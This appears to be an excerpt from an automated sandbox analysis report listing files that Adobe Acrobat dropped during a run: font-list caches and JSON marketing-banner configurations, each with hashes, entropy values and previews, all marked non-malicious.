Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6472

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.33519330510996
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJM3g98kUwPeUkwRe9:YvXKXFj0uuxtGcFNGMbLUkee9
MD5:	0B41AE9B7FE75163E236573DE7F3B024
SHA1:	57384C033379BE0E6CB74C8F81F421C09988AEF0
SHA-256:	AB723EEE8198AD63FFC13ED5C40D38D426FEEBD13FB8C4BE0005D071BB5C8426
SHA-512:	0CA6601F3E3DFF05DBDBFA89798221F158FA75EBACF519FFFC16788330011D412E540E3379865B25F36688E47BB72F968910AF5002CE3010A3076D74D9ED43BB
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.286318442367842
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfBoTfXpnrPeUkwRe9:YvXKXFj0uuxtGcFNGWTfXcUkee9
MD5:	BF92E74185028A507DED5AB0CC817DAF
SHA1:	F1D7ADFF7356D295AB5BFB4FB4FEB80D95B69982
SHA-256:	DC69A8AEB8921225072ACDECA2293A5998BD0A287257284E49A3CEF98DAE94E7
SHA-512:	6EB2786EFE6112F97CDEA85C47CFCE3E82DEADB74CDA195C297464B698B6FD62CDBBD9CE142F44FA6A68D0CC81A7F63C432B5F3D512FCCF4AC2C4ABA95EB5BD0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.264001463598211
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfBD2G6UpnrPeUkwRe9:YvXKXFj0uuxtGcFNGR22cUkee9
MD5:	6631AD4BF7B755D23AB6CB4D4708B999
SHA1:	1D06809AFEDEFBA2EBC09EBE74029F9BC2D2BC15
SHA-256:	14E7A3F65192646BBF62157E61656626B537F90C34711AE122F50EB68BDF68A7
SHA-512:	6000535CFE8890A553F75308AA439893C75023DB8C4D816D6BD536BF355913DC707FDF3D56C7569F6F3911E10D9931A2462087C47D978FBEE75C3574EAF8740A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.314227456871888
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfPmwrPeUkwRe9:YvXKXFj0uuxtGcFNGH56Ukee9
MD5:	9AFFB83B6516E0D7028224DC209093BB
SHA1:	DC8CBC8A1A6B51D46B9632AA94C1F6A8305CF85F
SHA-256:	F952B852989DC738CAAC12FFA512EDF8F40B0FB43F18E8ECA792257CFBAFE30D
SHA-512:	DB99E37724DE3B4D65FAD9D94BD9567CBEEECCA91DF431A49375445D31E56C04703F0E576837028BDC52C3EEB9CBDF10AEC56E2BF8B20166108249F8FAED7223
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.688406802687097
Encrypted:	false
SSDEEP:	24:Yv6XR07YpLgE9cQx8LennAvzBvkn0RCmK8czOCCSI:YvKthgy6SAFv5Ah8cv/I
MD5:	0134FBD4D4C2A937B8F10D8FEA0EA122
SHA1:	9D98BBA3E2B43D03BC91465D1C0925FCB784B1E8
SHA-256:	7F20A1A531233F01F9950D5F38D67D05E2330CC33099593258F7E9C74CB643F1
SHA-512:	D605DC81C957246B56D6E6EDC766BF8D7126BA01E39C7F539E55368F082502642D551A40AA6931C336FC035AAE3E8F949AC67A9031FE7571982A337B9AAC1778
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.263785437635299
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJf8dPeUkwRe9:YvXKXFj0uuxtGcFNGU8Ukee9
MD5:	BBC5F5234D1D18C0A3DF43D9F12CAE70
SHA1:	D2FAF363D000F6F0B9DB2A214132D81D0F1E9727
SHA-256:	6CFA496FAE28E51AA2FA0D7F23C011F9EDFEDC73B3D4BB01AAA1A4F3426F2408
SHA-512:	5FC5F630AC6AD8D69A7BA9F7A6516288646058C448DEFED89CFC753E5B4F71907B764B9CD610A9CC24D994169F4DC8068728F09F266731BEC78DB825E1274E1E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.266825929866428
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfQ1rPeUkwRe9:YvXKXFj0uuxtGcFNGY16Ukee9
MD5:	06C9C6D26D5CBE6666D6A5899AF2BF03
SHA1:	DD06F8D658E8EF46FCEC4899942050D21EBF84E2
SHA-256:	40A6824ED285772840F0F4E6980D2980FED356657538D8678E078702FF4C996D
SHA-512:	D630160F5CEA7E118AD49B9FD4FADB4E37E1CBE180A7491D7A96DF4C2947E97DD41D03A45D5A6F534F069625E6EE7A022CD9AC8116140BC1A35D21957F709B89
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.277791802451135
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfFldPeUkwRe9:YvXKXFj0uuxtGcFNGz8Ukee9
MD5:	90C735D9BBD4E4C20B708A24819EB3CC
SHA1:	B58EDA14662C4B90D7A504B7ACD2F02E4413C200
SHA-256:	42D43BA454934C53134F9178FB83984FA0A3C763C7E72BBDD81B0127554DBEBC
SHA-512:	B5809E5C472BAAC59598B6E47E2E83F7156DEDA156136BE1EEE5C2883E2BC97BC43D450CF4333BB8A1118F09A367B88C73DDBB60B36657EA17D7686951E44164
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.291884686137885
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfzdPeUkwRe9:YvXKXFj0uuxtGcFNGb8Ukee9
MD5:	182EE52188A9CA3BE42320AEDCD1A412
SHA1:	608E0097DEA21024FF0AA4866F94F46749BB08A4
SHA-256:	345F9D40A6333C8CD6BDD81571DAE33E45A95E768E83BA290C6C5DA994E2EA57
SHA-512:	A261EEC94B82959FA9CBB7AA8AAC1D29630619149C70C1F9BAF5D912009C145BDC9AC9C8E2EF5B5AA432214B3E497EB6787AC9212B9AD98E556B84921FB6B023
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.272235409520833
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfYdPeUkwRe9:YvXKXFj0uuxtGcFNGg8Ukee9
MD5:	4A6129C3E348EBE6A8118F246A983167
SHA1:	6BEEBDE5A26B4C807FE95BB33D21FBCCAB3E3B34
SHA-256:	8FAA1710780312F734950CEF9B9352740F05758E49C509EF4FAC02760D306A85
SHA-512:	6A2C790BF80A63396670943DBC7A3797DE7C098256FE4B05F788F17695DD6D38C63F04026C46CE1CE19A27F090F69B429EFE8FCF0694FC1CC382BEC118840868
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.258378322751506
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJf+dPeUkwRe9:YvXKXFj0uuxtGcFNG28Ukee9
MD5:	E86FE1A0D429234D18EFB9872E6DD1C5
SHA1:	9787D679125C6C95D18063392D8EE0EBB491794F
SHA-256:	B7EB5F65C294E53D856E2EA1745B33B08CEDBCD5F055F5DD5AD707533DFBFAA9
SHA-512:	7BCE50B2BBF1195D70CAFB16879FF8E1C25B27AF60CB7F354FABD2F72D16EECC09EF27B88978E6D42E58CA0A98BA88DE469EA5E0677AEBF6B292625C0D436CB8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.255973329122388
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfbPtdPeUkwRe9:YvXKXFj0uuxtGcFNGDV8Ukee9
MD5:	5ECAF575F4B3D1390437721E7269E7FF
SHA1:	3BF3376FFFA886D8527F8246FA38988A476C8CC9
SHA-256:	931721D4ACCD140BC0F1FBF8E55D3516FFF2976C36C214BBB770B8E0BFE54BF1
SHA-512:	E319AC435C68D53D9CE13BE9A93E2BDFC0BA016A61173CC74B6B7B47D257EBBA4EF509C7A7837EE3568B4F58BE60D2DA27E3A928F0942C159A53A5FBA1F1D923
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.259266211628454
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJf21rPeUkwRe9:YvXKXFj0uuxtGcFNG+16Ukee9
MD5:	881BE02AB9B1DD708E0E468FD93A55F0
SHA1:	76C6CE9325C6DD4FADD42621FC461EF176696E79
SHA-256:	657BFF3F38850B024D344A9289FE4585FBFA7CC5B1C8D7BD1F6FB9872200EE55
SHA-512:	8BE3B1065CCE0E88A83E6210F9036FC1FD26447650C0310963005D8730743E2CD25F71C844E0279EAD057C87CB576C0328F40A407BEDB72D49CA3C05B1E2F0E2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.664617713576417
Encrypted:	false
SSDEEP:	24:Yv6XR07samXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSI:YvKJBgkDMUJUAh8cvMI
MD5:	0A5004A4487B3424AD6F1517D7A41CC2
SHA1:	E57B768E9A23DE4C4CEF679AFD34D9D73ADFEECA
SHA-256:	13DAA283DBA50C26A0EF874A7CB918CE8E48020B018D1415ADB1EC9BD085EF3F
SHA-512:	06C99F1218285AA6D3D4FEA58D1575477B296EF23759FDEBBBE24C2138C703C063BC59C79FEE66A30A184651D98ADBB7ABF58CAFDFB59F51D0251D9E4456DC80
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.238354743802274
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJfshHHrPeUkwRe9:YvXKXFj0uuxtGcFNGUUUkee9
MD5:	E900686EFFE30876547FE9D7D87096BD
SHA1:	A0533D0F5B05B0A10A2F518C10D982659E9DEA25
SHA-256:	5EC3B0C3039C8809F348F23C73E03D1DCE1DC73F7403D40B47040F8C93935F3C
SHA-512:	CC2BC98F1A004650A25CD10CA31B8312F32A489055848E54ACDDF432CFCDB53FA7B57A0C33E4DCB59BD2FC5214CE6C9F88C171AEF1D588906DED5D4758359075
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.241989713309244
Encrypted:	false
SSDEEP:	6:YEQXJ2HXFN10uGhRXtGnZiQ0Ym2oAvJTqgFCrPeUkwRe9:YvXKXFj0uuxtGcFNGTq16Ukee9
MD5:	CE802E008C3059DC955242DAB03D33EC
SHA1:	18EC51E1DB6EDA30E1642854FCD2FD26CB38A80E
SHA-256:	F64B4DE006E2B72E34247EC5EBAD4775DC830E37310663A16BC70FCA10E8A040
SHA-512:	7099E748D92584EF8CEF61E9861AF0BDD9CC43843F274963D73837433B30ED7B9FFE39FD4C0D11F4487D0433304890C9B7357525747C01FFCED6F7C1074FA5EC
Malicious:	false
